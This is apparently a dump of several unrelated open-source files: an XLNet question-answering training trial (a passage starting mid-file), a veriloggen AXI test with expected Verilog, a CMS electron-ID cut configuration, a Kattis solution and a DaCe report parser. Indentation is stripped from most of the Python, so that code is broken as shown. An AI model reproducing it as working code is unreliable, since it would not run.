# Check to make sure the dataset is configured correctly.
if self.data_config.dataset_name is not None:
dataset_name = self.data_config.dataset_name
if dataset_name == "squad":
assert (
not self.data_config.version_2_with_negative
), "version_2_with_negative should be false for squad"
elif dataset_name == "squad_v2":
assert (
self.data_config.version_2_with_negative
), "version_2_with_negative should be true for squad_v2"
self.data_processors = data_beam_search
# Get the datasets: you can either provide your own CSV or JSON training and evaluation
# files (see below) or just provide the name of one of the public datasets available on the
# hub at https://huggingface.co/datasets/ (the dataset will be downloaded automatically
# from the datasets Hub).
# For CSV/JSON files, this script will use the column called 'text' or the first column if
# no column called 'text' is found. You can easily tweak this behavior (see below).
# See more about loading any type of standard or custom dataset (from files, python dict,
# pandas DataFrame, etc) at
# https://huggingface.co/docs/datasets/loading_datasets.html.
self.raw_datasets = hf.default_load_dataset(self.data_config)
self.column_names = self.raw_datasets["train"].column_names
# For beam search, we need to use a different model from the default model returned by
# AutoModelForQuestionAnswering. We will use a custom init in this case that is a slight
# modification of the BaseTransformerTrial init method.
self.exp_config = attrdict.AttrDict(context.get_experiment_config())
# Check to make sure all expected hyperparameters are set.
self.check_hparams()
# Parse hparams and data_config.
(
self.config_kwargs,
self.tokenizer_kwargs,
self.model_kwargs,
) = hf.default_parse_config_tokenizer_model_kwargs(self.hparams)
optimizer_kwargs, scheduler_kwargs = hf.default_parse_optimizer_lr_scheduler_kwargs(
self.hparams
)
self.config = transformers.XLNetConfig.from_pretrained(**self.config_kwargs)
self.tokenizer = transformers.XLNetTokenizerFast.from_pretrained(**self.tokenizer_kwargs)
# We need to use XLNetForQuestionAnswering instead of XLNetForQuestionAnsweringSimple
# which is the default returned by AutoModelForQuestionAnswering.
if self.hparams.use_pretrained_weights:
self.model_kwargs["config"] = self.config
self.model = transformers.XLNetForQuestionAnswering.from_pretrained(**self.model_kwargs)
else:
self.model = transformers.XLNetForQuestionAnswering(self.config)
self.model = self.context.wrap_model(self.model)
# The rest is the same as the parent init method.
self.optimizer = self.context.wrap_optimizer(
hf.build_default_optimizer(self.model, optimizer_kwargs)
)
if self.hparams.use_apex_amp:
self.model, self.optimizer = self.context.configure_apex_amp(
models=self.model,
optimizers=self.optimizer,
)
self.lr_scheduler = self.context.wrap_lr_scheduler(
hf.build_default_lr_scheduler(self.optimizer, scheduler_kwargs),
det_torch.LRScheduler.StepMode.STEP_EVERY_BATCH,
)
self.grad_clip_fn = (
lambda x: torch.nn.utils.clip_grad_norm_(x, optimizer_kwargs.max_grad_norm)
if optimizer_kwargs.max_grad_norm > 0 # type: ignore
else None
)
self.logger.info(self.config)
if not isinstance(self.tokenizer, transformers.PreTrainedTokenizerFast):
raise ValueError(
"This example script only works for models that have a fast tokenizer. Checkout "
"the big table of models at "
"https://huggingface.co/transformers/index.html#bigtable to find the model types "
"that meet this requirement"
)
# We need to create the tokenized dataset after init because we need to model and
# tokenizer to be available.
self.tokenized_datasets = self.build_datasets()
train_length = len(self.tokenized_datasets["train"])
self.logger.info("training records: {}".format(train_length))
if (
"records_per_epoch" in self.exp_config
and train_length != self.exp_config["records_per_epoch"]
):
self.logger.warning(
"number of train records {} does not match records_per_epoch of {}".format(
train_length, self.exp_config["records_per_epoch"]
)
)
# Create metric reducer
metric = datasets.load_metric(
"squad_v2" if self.data_config.version_2_with_negative else "squad"
)
self.reducer = context.experimental.wrap_reducer(
functools.partial(
qa_utils.compute_metrics,
self.data_config,
self.column_names,
self.data_processors.post_processing_function,
self.raw_datasets,
self.tokenized_datasets,
self.model,
metric,
),
for_training=False,
)
def build_datasets(self) -> Dict[str, Union[datasets.Dataset, datasets.DatasetDict]]:
tokenized_datasets = {}
for split in ["train", "validation"]:
tokenized_datasets[split] = self.raw_datasets[split].map(
functools.partial(
self.data_processors.prepare_features,
split,
self.data_config,
self.tokenizer,
self.column_names,
),
batched=True,
num_proc=self.data_config.preprocessing_num_workers,
remove_columns=self.column_names,
load_from_cache_file=not self.data_config.overwrite_cache,
)
hf.remove_unused_columns(self.model, tokenized_datasets[split])
if self.data_config.pad_to_max_length:
self.collator = transformers.default_data_collator
else:
collator = transformers.DataCollatorWithPadding(
self.tokenizer, pad_to_multiple_of=8 if self.hparams.use_apex_amp else None
)
self.collator = lambda x: collator(x).data
return tokenized_datasets
def build_training_data_loader(self) -> det_torch.DataLoader:
return det_torch.DataLoader(
self.tokenized_datasets["train"],
batch_size=self.context.get_per_slot_batch_size(),
collate_fn=self.collator,
)
def build_validation_data_loader(self) -> det_torch.DataLoader:
# Determined's distributed batch sampler interleaves shards on each GPU slot so
# sample i goes to worker with rank i % world_size. Therefore, we need to re-sort
# all the samples once we gather the predictions before computing the validation metric.
return det_torch.DataLoader(
qa_utils.DatasetWithIndex(self.tokenized_datasets["validation"]),
batch_size=self.context.get_per_slot_batch_size(),
collate_fn=self.collator,
)
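    # Illustrative note (the slot count is hypothetical): with 2 slots, slot 0 receives
    # validation samples 0, 2, 4, ... and slot 1 receives 1, 3, 5, ..., so the `ind` values
    # added by DatasetWithIndex are what allow compute_metrics to restore the original
    # sample order before the squad metric is evaluated.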
def evaluate_batch(self, batch: det_torch.TorchData, batch_idx: int) -> Dict:
ind = batch.pop("ind")
outputs = self.model(**batch)
if isinstance(outputs, dict):
predictions = tuple(
v.detach().cpu().numpy() for k, v in outputs.items() if k not in ("loss", "mems")
)
else:
predictions = outputs[1:].detach().cpu().numpy()
self.reducer.update((ind.detach().cpu().numpy(), predictions))
# Although we are returning the empty dictionary below, we will still get the metrics from
        # the custom reducer that we passed to the context during initialization.
return {}
|
frappe/modules/__init__.py
|
Don-Leopardo/frappe
| 3,755 |
88596
|
from .utils import *
|
tests/extension/types_/axi_/slave_readwrite_lite_simultaneous/test_types_axi_slave_readwrite_lite_simultaneous.py
|
jesseclin/veriloggen
| 232 |
88605
|
from __future__ import absolute_import
from __future__ import print_function
import veriloggen
import types_axi_slave_readwrite_lite_simultaneous
expected_verilog = """
module test;
reg CLK;
reg RST;
wire [32-1:0] sum;
reg [32-1:0] myaxi_awaddr;
reg [4-1:0] myaxi_awcache;
reg [3-1:0] myaxi_awprot;
reg myaxi_awvalid;
wire myaxi_awready;
reg [32-1:0] myaxi_wdata;
reg [4-1:0] myaxi_wstrb;
reg myaxi_wvalid;
wire myaxi_wready;
wire [2-1:0] myaxi_bresp;
wire myaxi_bvalid;
reg myaxi_bready;
reg [32-1:0] myaxi_araddr;
reg [4-1:0] myaxi_arcache;
reg [3-1:0] myaxi_arprot;
reg myaxi_arvalid;
wire myaxi_arready;
wire [32-1:0] myaxi_rdata;
wire [2-1:0] myaxi_rresp;
wire myaxi_rvalid;
reg myaxi_rready;
reg [32-1:0] _axi_awaddr;
wire [4-1:0] _axi_awcache;
wire [3-1:0] _axi_awprot;
reg _axi_awvalid;
wire _axi_awready;
reg [32-1:0] _axi_wdata;
reg [4-1:0] _axi_wstrb;
reg _axi_wvalid;
wire _axi_wready;
wire [2-1:0] _axi_bresp;
wire _axi_bvalid;
wire _axi_bready;
reg [32-1:0] _axi_araddr;
wire [4-1:0] _axi_arcache;
wire [3-1:0] _axi_arprot;
reg _axi_arvalid;
wire _axi_arready;
wire [32-1:0] _axi_rdata;
wire [2-1:0] _axi_rresp;
wire _axi_rvalid;
wire _axi_rready;
assign _axi_awcache = 3;
assign _axi_awprot = 0;
assign _axi_bready = 1;
assign _axi_arcache = 3;
assign _axi_arprot = 0;
reg [3-1:0] outstanding_wcount_0;
wire [32-1:0] _tmp_1;
assign _tmp_1 = _axi_awaddr;
always @(*) begin
myaxi_awaddr = _tmp_1;
end
wire [4-1:0] _tmp_2;
assign _tmp_2 = _axi_awcache;
always @(*) begin
myaxi_awcache = _tmp_2;
end
wire [3-1:0] _tmp_3;
assign _tmp_3 = _axi_awprot;
always @(*) begin
myaxi_awprot = _tmp_3;
end
wire _tmp_4;
assign _tmp_4 = _axi_awvalid;
always @(*) begin
myaxi_awvalid = _tmp_4;
end
assign _axi_awready = myaxi_awready;
wire [32-1:0] _tmp_5;
assign _tmp_5 = _axi_wdata;
always @(*) begin
myaxi_wdata = _tmp_5;
end
wire [4-1:0] _tmp_6;
assign _tmp_6 = _axi_wstrb;
always @(*) begin
myaxi_wstrb = _tmp_6;
end
wire _tmp_7;
assign _tmp_7 = _axi_wvalid;
always @(*) begin
myaxi_wvalid = _tmp_7;
end
assign _axi_wready = myaxi_wready;
assign _axi_bresp = myaxi_bresp;
assign _axi_bvalid = myaxi_bvalid;
wire _tmp_8;
assign _tmp_8 = _axi_bready;
always @(*) begin
myaxi_bready = _tmp_8;
end
wire [32-1:0] _tmp_9;
assign _tmp_9 = _axi_araddr;
always @(*) begin
myaxi_araddr = _tmp_9;
end
wire [4-1:0] _tmp_10;
assign _tmp_10 = _axi_arcache;
always @(*) begin
myaxi_arcache = _tmp_10;
end
wire [3-1:0] _tmp_11;
assign _tmp_11 = _axi_arprot;
always @(*) begin
myaxi_arprot = _tmp_11;
end
wire _tmp_12;
assign _tmp_12 = _axi_arvalid;
always @(*) begin
myaxi_arvalid = _tmp_12;
end
assign _axi_arready = myaxi_arready;
assign _axi_rdata = myaxi_rdata;
assign _axi_rresp = myaxi_rresp;
assign _axi_rvalid = myaxi_rvalid;
wire _tmp_13;
assign _tmp_13 = _axi_rready;
always @(*) begin
myaxi_rready = _tmp_13;
end
reg [32-1:0] read_fsm;
localparam read_fsm_init = 0;
reg [32-1:0] rsum;
reg __axi_cond_0_1;
reg __axi_cond_1_1;
assign _axi_rready = (read_fsm == 1) || (read_fsm == 3);
reg [32-1:0] write_fsm;
localparam write_fsm_init = 0;
reg __axi_cond_2_1;
reg [32-1:0] wdata;
reg __axi_cond_3_1;
reg __axi_cond_4_1;
reg __axi_cond_5_1;
main
uut
(
.CLK(CLK),
.RST(RST),
.sum(sum),
.myaxi_awaddr(myaxi_awaddr),
.myaxi_awcache(myaxi_awcache),
.myaxi_awprot(myaxi_awprot),
.myaxi_awvalid(myaxi_awvalid),
.myaxi_awready(myaxi_awready),
.myaxi_wdata(myaxi_wdata),
.myaxi_wstrb(myaxi_wstrb),
.myaxi_wvalid(myaxi_wvalid),
.myaxi_wready(myaxi_wready),
.myaxi_bresp(myaxi_bresp),
.myaxi_bvalid(myaxi_bvalid),
.myaxi_bready(myaxi_bready),
.myaxi_araddr(myaxi_araddr),
.myaxi_arcache(myaxi_arcache),
.myaxi_arprot(myaxi_arprot),
.myaxi_arvalid(myaxi_arvalid),
.myaxi_arready(myaxi_arready),
.myaxi_rdata(myaxi_rdata),
.myaxi_rresp(myaxi_rresp),
.myaxi_rvalid(myaxi_rvalid),
.myaxi_rready(myaxi_rready)
);
initial begin
CLK = 0;
forever begin
#5 CLK = !CLK;
end
end
initial begin
RST = 0;
_axi_awaddr = 0;
_axi_awvalid = 0;
_axi_wdata = 0;
_axi_wstrb = 0;
_axi_wvalid = 0;
_axi_araddr = 0;
_axi_arvalid = 0;
outstanding_wcount_0 = 0;
read_fsm = read_fsm_init;
rsum = 0;
__axi_cond_0_1 = 0;
__axi_cond_1_1 = 0;
write_fsm = write_fsm_init;
__axi_cond_2_1 = 0;
wdata = 100;
__axi_cond_3_1 = 0;
__axi_cond_4_1 = 0;
__axi_cond_5_1 = 0;
#100;
RST = 1;
#100;
RST = 0;
#100000;
$finish;
end
always @(posedge CLK) begin
if(RST) begin
outstanding_wcount_0 <= 0;
_axi_araddr <= 0;
_axi_arvalid <= 0;
__axi_cond_0_1 <= 0;
__axi_cond_1_1 <= 0;
_axi_awaddr <= 0;
_axi_awvalid <= 0;
__axi_cond_2_1 <= 0;
_axi_wdata <= 0;
_axi_wvalid <= 0;
_axi_wstrb <= 0;
__axi_cond_3_1 <= 0;
__axi_cond_4_1 <= 0;
__axi_cond_5_1 <= 0;
end else begin
if(__axi_cond_0_1) begin
_axi_arvalid <= 0;
end
if(__axi_cond_1_1) begin
_axi_arvalid <= 0;
end
if(__axi_cond_2_1) begin
_axi_awvalid <= 0;
end
if(__axi_cond_3_1) begin
_axi_wvalid <= 0;
end
if(__axi_cond_4_1) begin
_axi_awvalid <= 0;
end
if(__axi_cond_5_1) begin
_axi_wvalid <= 0;
end
if(_axi_wvalid && _axi_wready && !(_axi_bvalid && _axi_bready) && (outstanding_wcount_0 < 7)) begin
outstanding_wcount_0 <= outstanding_wcount_0 + 1;
end
if(!(_axi_wvalid && _axi_wready) && (_axi_bvalid && _axi_bready) && (outstanding_wcount_0 > 0)) begin
outstanding_wcount_0 <= outstanding_wcount_0 - 1;
end
if((read_fsm == 0) && (_axi_arready || !_axi_arvalid)) begin
_axi_araddr <= 1024;
_axi_arvalid <= 1;
end
__axi_cond_0_1 <= 1;
if(_axi_arvalid && !_axi_arready) begin
_axi_arvalid <= _axi_arvalid;
end
if((read_fsm == 2) && (_axi_arready || !_axi_arvalid)) begin
_axi_araddr <= 2048;
_axi_arvalid <= 1;
end
__axi_cond_1_1 <= 1;
if(_axi_arvalid && !_axi_arready) begin
_axi_arvalid <= _axi_arvalid;
end
if((write_fsm == 0) && (_axi_awready || !_axi_awvalid)) begin
_axi_awaddr <= 1024;
_axi_awvalid <= 1;
end
__axi_cond_2_1 <= 1;
if(_axi_awvalid && !_axi_awready) begin
_axi_awvalid <= _axi_awvalid;
end
if((write_fsm == 1) && ((outstanding_wcount_0 < 6) && (_axi_wready || !_axi_wvalid))) begin
_axi_wdata <= wdata;
_axi_wvalid <= 1;
_axi_wstrb <= { 4{ 1'd1 } };
end
__axi_cond_3_1 <= 1;
if(_axi_wvalid && !_axi_wready) begin
_axi_wvalid <= _axi_wvalid;
end
if((write_fsm == 2) && (_axi_awready || !_axi_awvalid)) begin
_axi_awaddr <= 1024;
_axi_awvalid <= 1;
end
__axi_cond_4_1 <= 1;
if(_axi_awvalid && !_axi_awready) begin
_axi_awvalid <= _axi_awvalid;
end
if((write_fsm == 3) && ((outstanding_wcount_0 < 6) && (_axi_wready || !_axi_wvalid))) begin
_axi_wdata <= wdata;
_axi_wvalid <= 1;
_axi_wstrb <= { 4{ 1'd1 } };
end
__axi_cond_5_1 <= 1;
if(_axi_wvalid && !_axi_wready) begin
_axi_wvalid <= _axi_wvalid;
end
end
end
localparam read_fsm_1 = 1;
localparam read_fsm_2 = 2;
localparam read_fsm_3 = 3;
localparam read_fsm_4 = 4;
localparam read_fsm_5 = 5;
always @(posedge CLK) begin
if(RST) begin
read_fsm <= read_fsm_init;
rsum <= 0;
end else begin
case(read_fsm)
read_fsm_init: begin
if(_axi_arready || !_axi_arvalid) begin
read_fsm <= read_fsm_1;
end
end
read_fsm_1: begin
if(_axi_rready && _axi_rvalid) begin
rsum <= rsum + _axi_rdata;
end
if(_axi_rready && _axi_rvalid) begin
read_fsm <= read_fsm_2;
end
end
read_fsm_2: begin
if(_axi_arready || !_axi_arvalid) begin
read_fsm <= read_fsm_3;
end
end
read_fsm_3: begin
if(_axi_rready && _axi_rvalid) begin
rsum <= rsum + _axi_rdata;
end
if(_axi_rready && _axi_rvalid) begin
read_fsm <= read_fsm_4;
end
end
read_fsm_4: begin
$display("rsum=%d expected_rsum=%d", rsum, 768);
read_fsm <= read_fsm_5;
end
endcase
end
end
localparam write_fsm_1 = 1;
localparam write_fsm_2 = 2;
localparam write_fsm_3 = 3;
localparam write_fsm_4 = 4;
localparam write_fsm_5 = 5;
localparam write_fsm_6 = 6;
localparam write_fsm_7 = 7;
localparam write_fsm_8 = 8;
localparam write_fsm_9 = 9;
localparam write_fsm_10 = 10;
localparam write_fsm_11 = 11;
localparam write_fsm_12 = 12;
localparam write_fsm_13 = 13;
localparam write_fsm_14 = 14;
localparam write_fsm_15 = 15;
always @(posedge CLK) begin
if(RST) begin
write_fsm <= write_fsm_init;
wdata <= 100;
end else begin
case(write_fsm)
write_fsm_init: begin
wdata <= 100;
if(_axi_awready || !_axi_awvalid) begin
write_fsm <= write_fsm_1;
end
end
write_fsm_1: begin
if((outstanding_wcount_0 < 6) && (_axi_wready || !_axi_wvalid)) begin
write_fsm <= write_fsm_2;
end
end
write_fsm_2: begin
wdata <= 200;
if(_axi_awready || !_axi_awvalid) begin
write_fsm <= write_fsm_3;
end
end
write_fsm_3: begin
if((outstanding_wcount_0 < 6) && (_axi_wready || !_axi_wvalid)) begin
write_fsm <= write_fsm_4;
end
end
write_fsm_4: begin
write_fsm <= write_fsm_5;
end
write_fsm_5: begin
write_fsm <= write_fsm_6;
end
write_fsm_6: begin
write_fsm <= write_fsm_7;
end
write_fsm_7: begin
write_fsm <= write_fsm_8;
end
write_fsm_8: begin
write_fsm <= write_fsm_9;
end
write_fsm_9: begin
write_fsm <= write_fsm_10;
end
write_fsm_10: begin
write_fsm <= write_fsm_11;
end
write_fsm_11: begin
write_fsm <= write_fsm_12;
end
write_fsm_12: begin
write_fsm <= write_fsm_13;
end
write_fsm_13: begin
write_fsm <= write_fsm_14;
end
write_fsm_14: begin
$display("sum=%d expected_sum=%d", sum, 300);
write_fsm <= write_fsm_15;
end
endcase
end
end
endmodule
module main
(
input CLK,
input RST,
output reg [32-1:0] sum,
input [32-1:0] myaxi_awaddr,
input [4-1:0] myaxi_awcache,
input [3-1:0] myaxi_awprot,
input myaxi_awvalid,
output myaxi_awready,
input [32-1:0] myaxi_wdata,
input [4-1:0] myaxi_wstrb,
input myaxi_wvalid,
output myaxi_wready,
output [2-1:0] myaxi_bresp,
output reg myaxi_bvalid,
input myaxi_bready,
input [32-1:0] myaxi_araddr,
input [4-1:0] myaxi_arcache,
input [3-1:0] myaxi_arprot,
input myaxi_arvalid,
output myaxi_arready,
output reg [32-1:0] myaxi_rdata,
output [2-1:0] myaxi_rresp,
output reg myaxi_rvalid,
input myaxi_rready
);
assign myaxi_bresp = 0;
assign myaxi_rresp = 0;
reg [32-1:0] fsm;
localparam fsm_init = 0;
reg [32-1:0] addr_0;
reg writevalid_1;
reg readvalid_2;
reg prev_awvalid_3;
reg prev_arvalid_4;
assign myaxi_awready = (fsm == 0) && (!writevalid_1 && !readvalid_2 && !myaxi_bvalid && prev_awvalid_3);
assign myaxi_arready = (fsm == 0) && (!readvalid_2 && !writevalid_1 && prev_arvalid_4 && !prev_awvalid_3);
reg [32-1:0] rdata;
reg _myaxi_cond_0_1;
assign myaxi_wready = fsm == 100;
always @(posedge CLK) begin
if(RST) begin
myaxi_bvalid <= 0;
prev_awvalid_3 <= 0;
prev_arvalid_4 <= 0;
writevalid_1 <= 0;
readvalid_2 <= 0;
addr_0 <= 0;
myaxi_rdata <= 0;
myaxi_rvalid <= 0;
_myaxi_cond_0_1 <= 0;
end else begin
if(_myaxi_cond_0_1) begin
myaxi_rvalid <= 0;
end
if(myaxi_bvalid && myaxi_bready) begin
myaxi_bvalid <= 0;
end
if(myaxi_wvalid && myaxi_wready) begin
myaxi_bvalid <= 1;
end
prev_awvalid_3 <= myaxi_awvalid;
prev_arvalid_4 <= myaxi_arvalid;
writevalid_1 <= 0;
readvalid_2 <= 0;
if(myaxi_awready && myaxi_awvalid && !myaxi_bvalid) begin
addr_0 <= myaxi_awaddr;
writevalid_1 <= 1;
end else if(myaxi_arready && myaxi_arvalid) begin
addr_0 <= myaxi_araddr;
readvalid_2 <= 1;
end
if((fsm == 1) && (myaxi_rready || !myaxi_rvalid)) begin
myaxi_rdata <= rdata;
myaxi_rvalid <= 1;
end
_myaxi_cond_0_1 <= 1;
if(myaxi_rvalid && !myaxi_rready) begin
myaxi_rvalid <= myaxi_rvalid;
end
end
end
localparam fsm_1 = 1;
localparam fsm_2 = 2;
localparam fsm_100 = 100;
localparam fsm_101 = 101;
always @(posedge CLK) begin
if(RST) begin
fsm <= fsm_init;
rdata <= 0;
sum <= 0;
end else begin
case(fsm)
fsm_init: begin
if(readvalid_2) begin
rdata <= addr_0 >> 2;
end
if(writevalid_1) begin
fsm <= fsm_100;
end
if(readvalid_2) begin
fsm <= fsm_1;
end
end
fsm_1: begin
if(myaxi_rready || !myaxi_rvalid) begin
rdata <= rdata + 1;
end
if(myaxi_rready || !myaxi_rvalid) begin
fsm <= fsm_2;
end
end
fsm_2: begin
fsm <= fsm_init;
end
fsm_100: begin
if(myaxi_wready && myaxi_wvalid) begin
sum <= sum + myaxi_wdata;
end
if(myaxi_wready && myaxi_wvalid) begin
fsm <= fsm_101;
end
end
fsm_101: begin
fsm <= fsm_init;
end
endcase
end
end
endmodule
"""
def test():
veriloggen.reset()
test_module = types_axi_slave_readwrite_lite_simultaneous.mkTest()
code = test_module.to_verilog()
from pyverilog.vparser.parser import VerilogParser
from pyverilog.ast_code_generator.codegen import ASTCodeGenerator
parser = VerilogParser()
expected_ast = parser.parse(expected_verilog)
codegen = ASTCodeGenerator()
expected_code = codegen.visit(expected_ast)
assert(expected_code == code)
|
RecoEgamma/ElectronIdentification/python/Identification/cutBasedElectronID_Spring15_25ns_V1_cff.py
|
ckamtsikis/cmssw
| 852 |
88614
|
<gh_stars>100-1000
from PhysicsTools.SelectorUtils.centralIDRegistry import central_id_registry
# Common functions and classes for ID definition are imported here:
from RecoEgamma.ElectronIdentification.Identification.cutBasedElectronID_tools import *
#
# This is the first round of Spring15 25ns cuts, optimized on Spring15 25ns samples.
#
# The ID cuts below are optimized IDs for Spring15 Scenario with 25ns bunch spacing
# The cut values are taken from the twiki:
# https://twiki.cern.ch/twiki/bin/view/CMS/CutBasedElectronIdentificationRun2
# (where they may not stay, if a newer version of cuts becomes available for these
# conditions)
# See also the presentation explaining these working points (this will not change):
# https://indico.cern.ch/event/370507/contribution/1/attachments/1140657/1633761/Rami_eleCB_ID_25ns.pdf
#
# First, define cut values
#
# Veto working point Barrel and Endcap
idName = "cutBasedElectronID-Spring15-25ns-V1-standalone-veto"
WP_Veto_EB = EleWorkingPoint_V2(
idName , # idName
0.0152 , # dEtaInCut
0.216 , # dPhiInCut
0.0114 , # full5x5_sigmaIEtaIEtaCut
0.181 , # hOverECut
0.0564 , # dxyCut
0.472 , # dzCut
0.207 , # absEInverseMinusPInverseCut
0.126 , # relCombIsolationWithEALowPtCut
0.126 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
2 # missingHitsCut
)
WP_Veto_EE = EleWorkingPoint_V2(
idName , # idName
0.0113 , # dEtaInCut
0.237 , # dPhiInCut
0.0352 , # full5x5_sigmaIEtaIEtaCut
0.116 , # hOverECut
0.222 , # dxyCut
0.921 , # dzCut
0.174 , # absEInverseMinusPInverseCut
0.144 , # relCombIsolationWithEALowPtCut
0.144 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
3 # missingHitsCut
)
# Loose working point Barrel and Endcap
idName = "cutBasedElectronID-Spring15-25ns-V1-standalone-loose"
WP_Loose_EB = EleWorkingPoint_V2(
idName , # idName
0.0105 , # dEtaInCut
0.115 , # dPhiInCut
0.0103 , # full5x5_sigmaIEtaIEtaCut
0.104 , # hOverECut
0.0261 , # dxyCut
0.41 , # dzCut
0.102 , # absEInverseMinusPInverseCut
0.0893 , # relCombIsolationWithEALowPtCut
0.0893 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
2 # missingHitsCut
)
WP_Loose_EE = EleWorkingPoint_V2(
idName , # idName
0.00814 , # dEtaInCut
0.182 , # dPhiInCut
0.0301 , # full5x5_sigmaIEtaIEtaCut
0.0897 , # hOverECut
0.118 , # dxyCut
0.822 , # dzCut
0.126 , # absEInverseMinusPInverseCut
0.121 , # relCombIsolationWithEALowPtCut
0.121 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
1 # missingHitsCut
)
# Medium working point Barrel and Endcap
idName = "cutBasedElectronID-Spring15-25ns-V1-standalone-medium"
WP_Medium_EB = EleWorkingPoint_V2(
idName , # idName
0.0103 , # dEtaInCut
0.0336 , # dPhiInCut
0.0101 , # full5x5_sigmaIEtaIEtaCut
0.0876 , # hOverECut
0.0118 , # dxyCut
0.373 , # dzCut
0.0174 , # absEInverseMinusPInverseCut
0.0766 , # relCombIsolationWithEALowPtCut
0.0766 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
2 # missingHitsCut
)
WP_Medium_EE = EleWorkingPoint_V2(
idName , # idName
0.00733 , # dEtaInCut
0.114 , # dPhiInCut
0.0283 , # full5x5_sigmaIEtaIEtaCut
0.0678 , # hOverECut
0.0739 , # dxyCut
0.602 , # dzCut
0.0898 , # absEInverseMinusPInverseCut
0.0678 , # relCombIsolationWithEALowPtCut
0.0678 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
1 # missingHitsCut
)
# Tight working point Barrel and Endcap
idName = "cutBasedElectronID-Spring15-25ns-V1-standalone-tight"
WP_Tight_EB = EleWorkingPoint_V2(
idName , # idName
0.00926 , # dEtaInCut
0.0336 , # dPhiInCut
0.0101 , # full5x5_sigmaIEtaIEtaCut
0.0597 , # hOverECut
0.0111 , # dxyCut
0.0466 , # dzCut
0.012 , # absEInverseMinusPInverseCut
0.0354 , # relCombIsolationWithEALowPtCut
0.0354 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
2 # missingHitsCut
)
WP_Tight_EE = EleWorkingPoint_V2(
idName , # idName
0.00724 , # dEtaInCut
0.0918 , # dPhiInCut
0.0279 , # full5x5_sigmaIEtaIEtaCut
0.0615 , # hOverECut
0.0351 , # dxyCut
0.417 , # dzCut
0.00999 , # absEInverseMinusPInverseCut
0.0646 , # relCombIsolationWithEALowPtCut
0.0646 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
1 # missingHitsCut
)
# Second, define what effective areas to use for pile-up correction
isoEffAreas = "RecoEgamma/ElectronIdentification/data/Spring15/effAreaElectrons_cone03_pfNeuHadronsAndPhotons_25ns.txt"
#
# Set up VID configuration for all cuts and working points
#
cutBasedElectronID_Spring15_25ns_V1_standalone_veto = configureVIDCutBasedEleID_V2(WP_Veto_EB, WP_Veto_EE, isoEffAreas)
cutBasedElectronID_Spring15_25ns_V1_standalone_loose = configureVIDCutBasedEleID_V2(WP_Loose_EB, WP_Loose_EE, isoEffAreas)
cutBasedElectronID_Spring15_25ns_V1_standalone_medium = configureVIDCutBasedEleID_V2(WP_Medium_EB, WP_Medium_EE, isoEffAreas)
cutBasedElectronID_Spring15_25ns_V1_standalone_tight = configureVIDCutBasedEleID_V2(WP_Tight_EB, WP_Tight_EE, isoEffAreas)
# The MD5 sum numbers below reflect the exact set of cut variables
# and values above. If anything changes, one has to
# 1) comment out the lines below about the registry,
# 2) run "calculateMD5 <this file name> <one of the VID config names just above>",
# 3) update the MD5 sum strings below and uncomment the lines again.
#
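# For example, an illustrative invocation for the veto working point defined above
# (the path to this file depends on your local release area) would be:
#   calculateMD5 cutBasedElectronID_Spring15_25ns_V1_cff.py cutBasedElectronID_Spring15_25ns_V1_standalone_veto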
central_id_registry.register(cutBasedElectronID_Spring15_25ns_V1_standalone_veto.idName,
'202030579ee3eec90fdc2d236ba3de7e')
central_id_registry.register(cutBasedElectronID_Spring15_25ns_V1_standalone_loose.idName,
'4fab9e4d09a2c1a36cbbd2279deb3627')
central_id_registry.register(cutBasedElectronID_Spring15_25ns_V1_standalone_medium.idName,
'aa291aba714c148fcba156544907c440')
central_id_registry.register(cutBasedElectronID_Spring15_25ns_V1_standalone_tight.idName,
'4e13b87c0573d3c8ebf91d446fa1d90f')
### for now until we have a database...
cutBasedElectronID_Spring15_25ns_V1_standalone_veto.isPOGApproved = cms.untracked.bool(True)
cutBasedElectronID_Spring15_25ns_V1_standalone_loose.isPOGApproved = cms.untracked.bool(True)
cutBasedElectronID_Spring15_25ns_V1_standalone_medium.isPOGApproved = cms.untracked.bool(True)
cutBasedElectronID_Spring15_25ns_V1_standalone_tight.isPOGApproved = cms.untracked.bool(True)
|
kattis/addingwords.py
|
Ashindustry007/competitive-programming
| 506 |
88621
|
#!/usr/bin/env python2
# https://open.kattis.com/problems/addingwords
a = {}
b = {}
while True:
try:
line = raw_input()
except:
break
fs = line.split()
if fs[0] == 'def':
n = fs[1]
v = int(fs[2])
if n in a: del(b[a[n]])
a[n] = v
b[v] = n
elif fs[0] == 'calc':
r = 0
result = True
if fs[1] not in a: result = False
else: r = a[fs[1]]
for i in range(2, len(fs), 2):
if fs[i] == '=': break
plus = fs[i] == '+'
if fs[i + 1] not in a: result = False
elif plus: r += a[fs[i + 1]]
else: r -= a[fs[i + 1]]
print ' '.join(fs[1:]),
if not result or r not in b: print 'unknown'
else: print b[r]
elif fs[0] == 'clear':
a = {}
b = {}
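# Illustrative session (made-up input, not the official Kattis sample):
#   def foo 3
#   def bar 7
#   def ten 10
#   calc foo + bar =
# prints "foo + bar = ten", because 3 + 7 = 10 and 10 maps back to the name 'ten';
# after a "clear", the same query would print "foo + bar = unknown".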
|
dace/codegen/instrumentation/report.py
|
jnice-81/dace
| 227 |
88631
|
# Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
""" Implementation of the performance instrumentation report. """
import json
import numpy as np
import re
class InstrumentationReport(object):
@staticmethod
def get_event_uuid(event):
uuid = (-1, -1, -1)
if 'args' in event:
args = event['args']
if 'sdfg_id' in args and args['sdfg_id'] is not None:
uuid = (args['sdfg_id'], -1, -1)
if 'state_id' in args and args['state_id'] is not None:
uuid = (uuid[0], args['state_id'], -1)
if 'id' in args and args['id'] is not None:
uuid = (uuid[0], uuid[1], args['id'])
return uuid
def __init__(self, filename: str):
# Parse file
match = re.match(r'.*report-(\d+)\.json', filename)
self.name = match.groups()[0] if match is not None else 'N/A'
self.durations = {}
self.counters = {}
self._sortcat = None
self._sortdesc = False
with open(filename, 'r') as fp:
report = json.load(fp)
if 'traceEvents' not in report or 'sdfgHash' not in report:
print(filename, 'is not a valid SDFG instrumentation report!')
return
